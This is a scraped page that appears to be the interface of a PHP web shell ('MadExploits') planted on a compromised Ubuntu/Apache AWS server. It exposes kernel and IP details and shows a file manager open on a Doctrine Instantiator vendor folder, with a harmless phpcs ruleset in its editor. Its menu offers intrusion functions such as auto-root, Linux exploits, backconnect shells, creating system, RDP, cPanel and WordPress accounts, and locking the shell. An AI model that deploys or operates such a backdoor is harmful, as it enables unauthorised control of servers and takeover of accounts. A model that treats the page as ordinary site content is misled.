Linux ip-172-31-33-47 5.4.0-1045-aws #47~18.04.1-Ubuntu SMP Tue Apr 13 15:58:14 UTC 2021 x86_64
Apache/2.4.29 (Ubuntu)
: 172.31.33.47 | : 216.73.216.166
Cant Read [ /etc/named.conf ]
7.4.20
www-data
www.github.com/MadExploits
Terminal
AUTO ROOT
Adminer
Backdoor Destroyer
Linux Exploit
Lock Shell
Lock File
Create User
CREATE RDP
PHP Mailer
BACKCONNECT
UNLOCK SHELL
HASH IDENTIFIER
CPANEL RESET
CREATE WP USER
README
+ Create Folder
+ Create File
/
var /
www /
html /
boaz /
vendor /
doctrine /
instantiator /
[ HOME SHELL ]
Name
Size
Permission
Action
.github
[ DIR ]
drwxrwxr-x
docs
[ DIR ]
drwxrwxr-x
src
[ DIR ]
drwxrwxr-x
.doctrine-project.json
900
B
-rw-rw-r--
CONTRIBUTING.md
1.01
KB
-rw-rw-r--
LICENSE
1.04
KB
-rw-rw-r--
README.md
1.56
KB
-rw-rw-r--
composer.json
1.35
KB
-rw-rw-r--
phpbench.json
101
B
-rw-rw-r--
phpcs.xml.dist
2.09
KB
-rw-rw-r--
phpstan.neon.dist
413
B
-rw-rw-r--
Delete
Unzip
Zip
${this.title}
Close
Code Editor : phpcs.xml.dist
<?xml version="1.0"?> <ruleset> <arg name="basepath" value="."/> <arg name="extensions" value="php"/> <arg name="parallel" value="80"/> <arg name="cache" value=".phpcs-cache"/> <arg name="colors"/> <!-- Ignore warnings, show progress of the run and show sniff names --> <arg value="nps"/> <file>src</file> <file>tests</file> <rule ref="Doctrine"> <exclude name="SlevomatCodingStandard.TypeHints.DeclareStrictTypes"/> <exclude name="SlevomatCodingStandard.TypeHints.TypeHintDeclaration.MissingParameterTypeHint"/> <exclude name="SlevomatCodingStandard.TypeHints.TypeHintDeclaration.MissingReturnTypeHint"/> <exclude name="SlevomatCodingStandard.Exceptions.ReferenceThrowableOnly.ReferencedGeneralException"/> </rule> <!-- Disable the rules that will require PHP 7.4 --> <rule ref="SlevomatCodingStandard.TypeHints.PropertyTypeHint"> <properties> <property name="enableNativeTypeHint" value="false"/> </properties> </rule> <rule ref="SlevomatCodingStandard.TypeHints.ParameterTypeHint.MissingNativeTypeHint"> <exclude-pattern>*/src/*</exclude-pattern> </rule> <rule ref="SlevomatCodingStandard.TypeHints.ReturnTypeHint.MissingNativeTypeHint"> <exclude-pattern>*/src/*</exclude-pattern> </rule> <rule ref="SlevomatCodingStandard.Classes.SuperfluousAbstractClassNaming"> <exclude-pattern>tests/DoctrineTest/InstantiatorTestAsset/AbstractClassAsset.php</exclude-pattern> </rule> <rule ref="SlevomatCodingStandard.Classes.SuperfluousExceptionNaming"> <exclude-pattern>src/Doctrine/Instantiator/Exception/UnexpectedValueException.php</exclude-pattern> <exclude-pattern>src/Doctrine/Instantiator/Exception/InvalidArgumentException.php</exclude-pattern> </rule> <rule ref="SlevomatCodingStandard.Classes.SuperfluousInterfaceNaming"> <exclude-pattern>src/Doctrine/Instantiator/Exception/ExceptionInterface.php</exclude-pattern> <exclude-pattern>src/Doctrine/Instantiator/InstantiatorInterface.php</exclude-pattern> </rule> </ruleset>
Close